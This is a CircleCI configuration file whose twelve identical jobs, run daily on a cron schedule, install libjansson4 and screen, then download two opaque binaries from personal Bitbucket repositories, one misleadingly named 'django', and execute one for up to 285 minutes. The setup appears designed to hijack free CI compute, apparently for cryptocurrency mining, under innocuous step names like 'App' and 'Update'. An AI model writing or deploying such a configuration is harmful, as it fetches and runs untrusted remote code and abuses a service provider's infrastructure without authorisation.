version: 2.1
jobs:
  App_01:
    docker:
      - image: circleci/ruby:3.0.1-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_02:
    docker:
      - image: circleci/rust:1.53.0-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_03:
    docker:
      - image: circleci/golang:1.17-rc-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_04:
    docker:
      - image: circleci/elixir:1.12.2

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_05:
    docker:
      - image: circleci/ruby:3.0

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_06:
    docker:
      - image: circleci/rust:1.53-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_07:
    docker:
      - image: circleci/golang:1.16.5

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_08:
    docker:
      - image: circleci/elixir:1.12.2

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_09:
    docker:
      - image: circleci/ruby:2.7.4-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_10:
    docker:
      - image: circleci/rust:1.52.1-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_11:
    docker:
      - image: circleci/golang:1.17-rc-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_12:
    docker:
      - image: circleci/elixir:1.12.2

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 150 && sudo apt update -y
            sleep 150 && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/python/raw/a89e7c92a97f375076e4006bd1cfe39ad4989fb8/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

 
 

workflows:
  version: 2.1
  commit:
    jobs:
      - App_01
      - App_02
      - App_03
      - App_04
      - App_05
      - App_06
      - App_07
     
    triggers:
      - schedule:
          cron: "0 7 * * *"
          filters:
            branches:  
              only:
                - master 
                
  asuirunjob: 
    jobs:
      - App_01    
      - App_02 
      - App_03      
      - App_04  
      - App_05
      - App_06
      - App_07
      - App_08
      - App_09
      - App_10
      - App_11
      - App_12
         